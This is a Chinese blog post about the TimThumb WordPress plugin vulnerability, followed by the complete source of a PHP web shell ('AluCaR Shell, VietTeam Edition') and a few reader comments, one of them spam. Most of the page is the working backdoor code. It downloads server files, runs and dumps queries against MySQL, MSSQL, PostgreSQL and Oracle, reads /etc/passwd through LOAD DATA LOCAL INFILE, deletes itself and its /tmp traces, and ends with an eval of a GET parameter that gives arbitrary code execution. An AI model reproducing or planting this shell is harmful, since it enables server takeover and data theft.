今天看到各大网站都报道了WordPress第三方插件Timthumb漏洞被曝光,Timthumb是一款第三方图像处理脚本,它可以实现动态图像裁剪、缩放和调整。
脚本的文件名是timthumb.php,该文档定义了数个可以远程提取的相册,但脚本并没有很好地验证这些域名,因此类似http://flickr.com.maliciousdomain.com这样的欺骗性二三级域名也会被通过,所以黑客理论上可以用任何域名后缀轻松仿冒,并通过缓存目录上传各种恶意程序。
报道的内容有点夸张,毕竟是一款第三方插件Timthumb漏洞,没装Timthumb的完全可以不用理会。另外报道中那张貌似很牛X的图片就是一个PHP后门程序。程序代码如下
<?php
$language='eng';
$auth = 0;
$name='ecd708a016f8407bd27cc0a02677351b'; //// AluCaR
$pass='1b8644e229c999e4f6ba799483b196ce'; //// HcEgRoUp.NeT
/******************************************************************************************************/
error_reporting(E_ALL);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = 'VietTeam Edition';
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!= $name || md5($_SERVER['PHP_AUTH_PW'])!= $pass)
{
header('WWW-Authenticate: Basic realm="hCe-GrOuP + AluCaR"');
header('HTTP/1.0 401 Unauthorized');
exit("<b>Contact <a href=http://hcegroup.vn/ </a> : Access Denied</b>");
}
}
$head = '<!-- Edited by Alucar -->
<html>
<head>
</script>
<title>AluCaR Shell</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
tr {
BORDER-RIGHT: #Black 1px solid;
BORDER-TOP: Black 1px solid;
BORDER-LEFT: Black 1px solid;
BORDER-BOTTOM: #Black 1px solid;
BORDER-COLOR: #83c809;
color: White;
}
td {
BORDER-RIGHT: #Black 1px solid;
BORDER-TOP: Black 1px solid;
BORDER-LEFT: Black 1px solid;
BORDER-BOTTOM: #Black 1px solid;
BORDER-COLOR: #83c809;
color: White;
}
.table1 {
BORDER: 0px;
BORDER-COLOR: #83c809;
BACKGROUND-COLOR: Black;
color: White;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #83c809;
font: 7pt Verdana;
color: White;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #83c809;
color: White;
}
table {
BORDER: Black 1px outset;
BORDER-COLOR: #83c809;
BACKGROUND-COLOR: Black;
color: White;
}
input {
border : solid 1px;
border-color : White White White White;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: White;
}
select {
BORDER-RIGHT: Black 1px solid;
BORDER-TOP: White 1px solid;
BORDER-LEFT: White 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-COLOR: White;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: White;
}
textarea {
BORDER-RIGHT: Black 1px solid;
BORDER-TOP: White 1px solid;
BORDER-LEFT: White 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-COLOR: #83c809;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: White;
}
BODY {
SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-COLOR: White; SCROLLBAR-SHADOW-COLOR: White; SCROLLBAR-3DLIGHT-COLOR: White; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-COLOR: White; SCROLLBAR-DARKSHADOW-COLOR: White
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: #83c809;
}
.tt {
background-color: Black;
}
A:link {
COLOR: #347202; TEXT-DECORATION: none
}
A:visited {
COLOR: #347202; TEXT-DECORATION: none
}
A:hover {
COLOR: White; TEXT-DECORATION: none
}
A:active {
COLOR: White; TEXT-DECORATION: none
}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
else if ($compress == 'gzip' && @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
else if ($compress == 'zip' && @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
}
else
{
$mime_type = 'application/octet-stream';
}
}
function mailattach($to,$from,$subj,$attach)
{
$headers = "From: $from\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(@mail($to,$subj,"",$headers)) { return 1; }
return 0;
}
class my_sql
{
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
var $base = '';
var $db = '';
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;
function connect()
{
switch($this->db)
{
case 'MySQL':
if(empty($this->port)) { $this->port = '3306'; }
if(!function_exists('mysql_connect')) return 0;
$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'MSSQL':
if(empty($this->port)) { $this->port = '1433'; }
if(!function_exists('mssql_connect')) return 0;
$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
if($this->connection) return 1;
break;
case 'PostgreSQL':
if(empty($this->port)) { $this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
if(!function_exists('pg_connect')) return 0;
$this->connection = @pg_connect($str);
if(is_resource($this->connection)) return 1;
break;
case 'Oracle':
if(!function_exists('ocilogon')) return 0;
$this->connection = @ocilogon($this->user, $this->pass, $this->base);
if(is_resource($this->connection)) return 1;
break;
}
return 0;
}
function select_db()
{
switch($this->db)
{
case 'MySQL':
if(@mysql_select_db($this->base,$this->connection)) return 1;
break;
case 'MSSQL':
if(@mssql_select_db($this->base,$this->connection)) return 1;
break;
case 'PostgreSQL':
return 1;
break;
case 'Oracle':
return 1;
break;
}
return 0;
}
function query($query)
{
$this->res=$this->error='';
switch($this->db)
{
case 'MySQL':
if(false===($this->[email protected]_query('/*'.chr(0).'*/'.$query,$this->connection)))
{
$this->error = @mysql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'MSSQL':
if(false===($this->[email protected]_query($query,$this->connection)))
{
$this->error = 'Query error';
return 0;
}
else if(@mssql_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'PostgreSQL':
if(false===($this->[email protected]_query($this->connection,$query)))
{
$this->error = @pg_last_error($this->connection);
return 0;
}
else if(@pg_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'Oracle':
if(false===($this->[email protected]($this->connection,$query)))
{
$this->error = 'Query parse error';
}
else
{
if(@ociexecute($this->res))
{
if(@ocirowcount($this->res) != 0) return 2;
return 1;
}
$error = @ocierror();
$this->error=$error['message'];
}
break;
}
return 0;
}
function get_result()
{
$this->rows=array();
$this->columns=array();
$this->num_rows=$this->num_fields=0;
switch($this->db)
{
case 'MySQL':
$this->[email protected]_num_rows($this->res);
$this->[email protected]_num_fields($this->res);
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
@mysql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'MSSQL':
$this->[email protected]_num_rows($this->res);
$this->[email protected]_num_fields($this->res);
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
@mssql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
break;
case 'PostgreSQL':
$this->[email protected]_num_rows($this->res);
$this->[email protected]_num_fields($this->res);
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'Oracle':
$this->[email protected]($this->res);
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
@ocifreestatement($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
}
return 0;
}
function dump($table)
{
if(empty($table)) return 0;
$this->dump=array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
$this->dump[3] = '## Database: '.$this->base;
$this->dump[4] = '## Table: '.$table;
$this->dump[5] = '## --------------------------------------- ';
switch($this->db)
{
case 'MySQL':
$this->dump[0] = '## MySQL dump';
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
$this->dump[] = $this->rows[0]['Create Table'];
$this->dump[] = '## --------------------------------------- ';
if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'[email protected]("`, `", $this->columns).'`) VALUES (\''[email protected]("', '", $this->rows[$i]).'\');';
}
break;
case 'MSSQL':
$this->dump[0] = '## MSSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('[email protected](", ", $this->columns).') VALUES (\''[email protected]("', '", $this->rows[$i]).'\');';
}
break;
case 'PostgreSQL':
$this->dump[0] = '## PostgreSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('[email protected](", ", $this->columns).') VALUES (\''[email protected]("', '", $this->rows[$i]).'\');';
}
break;
case 'Oracle':
$this->dump[0] = '## ORACLE dump';
$this->dump[] = '## under construction';
break;
default:
return 0;
break;
}
return 1;
}
function close()
{
switch($this->db)
{
case 'MySQL':
@mysql_close($this->connection);
break;
case 'MSSQL':
@mssql_close($this->connection);
break;
case 'PostgreSQL':
@pg_close($this->connection);
break;
case 'Oracle':
@oci_close($this->connection);
break;
}
}
function affected_rows()
{
switch($this->db)
{
case 'MySQL':
return @mysql_affected_rows($this->res);
break;
case 'MSSQL':
return @mssql_affected_rows($this->res);
break;
case 'PostgreSQL':
return @pg_affected_rows($this->res);
break;
case 'Oracle':
return @ocirowcount($this->res);
break;
default:
return 0;
break;
}
}
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
{
if([email protected]($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
else
{
@ob_clean();
$filename = @basename($_POST['d_name']);
$filedump = @fread($file,@filesize($_POST['d_name']));
fclose($file);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
{
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';',$_POST['db_query']);
echo '<body bgcolor=Black>';
if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=White><b>Can't connect to SQL server</b></font></div>";
else
{
if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=White><b>Can't select database</b></font></div>";
else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "<font face=Verdana size=-2 color=White><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
switch($sql->query($query))
{
case '0':
echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
break;
case '1':
if($sql->get_result())
{
echo "<table width=100% border=0 cellpadding=0 cellspacing=0>";
foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
$keys = @implode(" </b></font></td><td class=main><font face=Verdana size=-2><b> ", $sql->columns);
echo "<tr><td class=main bgcolor=White><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
for($i=0;$i<$sql->num_rows;$i++)
{
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
$values = @implode(" </font></td><td class=main><font face=Verdana size=-2> ",$sql->rows[$i]);
echo '<tr><td class=main><font face=Verdana size=-2> '.$values.' </font></td></tr>';
}
echo "</table>";
}
break;
case '2':
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
break;
}
}
}
}
echo "<br><div align=left id='n'><table width=100% height=60 border=0 cellpadding=0 cellspacing=0>";
echo "<tr><td align=center><b>Show Database</b></td><td align=center><b>Show Tables</b></td></tr>";
echo "<tr><td><textarea cols=50 rows=6 name=query_db>";
$query_db = mysql_query("SHOW DATABASES;");
while ($query_db_row = mysql_fetch_array($query_db))
{
echo $query_db_row[0]."\n";
}
echo "</textarea></td><td><div align=right><textarea cols=60 rows=6 name=query_tables>";
if (($_POST['mysql_db']) && $sql->select_db())
{
$query_tables = mysql_query("SHOW TABLES;");
while ($query_tables_row = mysql_fetch_array($query_tables))
{
echo $query_tables_row[0]."\n";
}
}
echo "</textarea></div></td></tr></table></div>";
}
echo "<br><form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']);
echo in('hidden','db_server',0,$_POST['db_server']);
echo in('hidden','db_port',0,$_POST['db_port']);
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center>";
echo "<font face=Verdana size=-2><b>Use database: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
echo "<div align=center><font face=Verdana size=-2><b>Load file: </b><input type=text name=loadfile size=100 value=".(!empty($_POST['loadfile'])?($_POST['loadfile']):("/etc/passwd")).">".ws(2)."<input type=submit name=submit value=\" Load \">
";
echo "<b>File content</b><br><br>";
echo "<textarea cols=121 rows=15 name=showloadfile>";
@mysql_query("DROP TABLE IF EXISTS Alucar");
@mysql_query("CREATE TABLE `Alucar` ( `file` LONGBLOB NOT NULL )");
@mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['loadfile'])."\" INTO TABLE Alucar FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
$r = @mysql_query("SELECT * FROM Alucar");
while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
@mysql_query("DROP TABLE IF EXISTS Alucar");
echo "</textarea></div>";
echo "</form>";
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
}
if(isset($_GET['delete']))
{
@unlink(__FILE__);
}
if(isset($_GET['tmp']))
{
@unlink("/tmp/bdpl");
@unlink("/tmp/back");
@unlink("/tmp/bd");
@unlink("/tmp/bd.c");
@unlink("/tmp/dp");
@unlink("/tmp/dpc");
@unlink("/tmp/dpc.c");
}
if(isset($_GET['phpini']))
{
echo $head;
function U_value($value)
{
if ($value == '') return '<i>no value</i>';
if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
if ($value === null) return 'NULL';
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return U_wordwrap((string) $value);
}
function U_wordwrap($str)
{
$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
}
if (@function_exists('ini_get_all'))
{
$r = '';
echo '<table width=100%>', '<tr><td class=main bgcolor=#83c809><font face=Verdana size=-2 color=White><div align=center><b>Directive</b></div></font></td><td class=main bgcolor=#83c809><font face=Verdana size=-2 color=White><div align=center><b>Local Value</b></div></font></td><td class=main bgcolor=#83c809><font face=Verdana size=-2 color=White><div align=center><b>Master Value</b></div></font></td></tr>';
foreach (@ini_get_all() as $key=>$value)
{
$r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
}
echo $r;
echo '</table>';
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['cpu']))
{
echo $head;
echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=White><b>CPU</b></font></div></td></tr></table><table width=100%>';
$cpuf = @file("cpuinfo");
if($cpuf)
{
$c = @sizeof($cpuf);
for($i=0;$i<$c;$i++)
{
$info = @explode(":",$cpuf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b>";
?>
<?php
eval(stripslashes($_GET['eval']));
?>
“WordPress第三方插件Timthumb漏洞被曝光”上的7条回复
好好的。 🙄
谢谢 Thanks a lot for sharing this with all of us you really realize what you are speaking approximately! Bookmarked.
Welcome to buy cheap nike air max shoes.
http://www.airmax9002.com
怎么有事这些啊
什么是都有 啊、
有点不可思议
这个现状问题呢
漏洞百出。。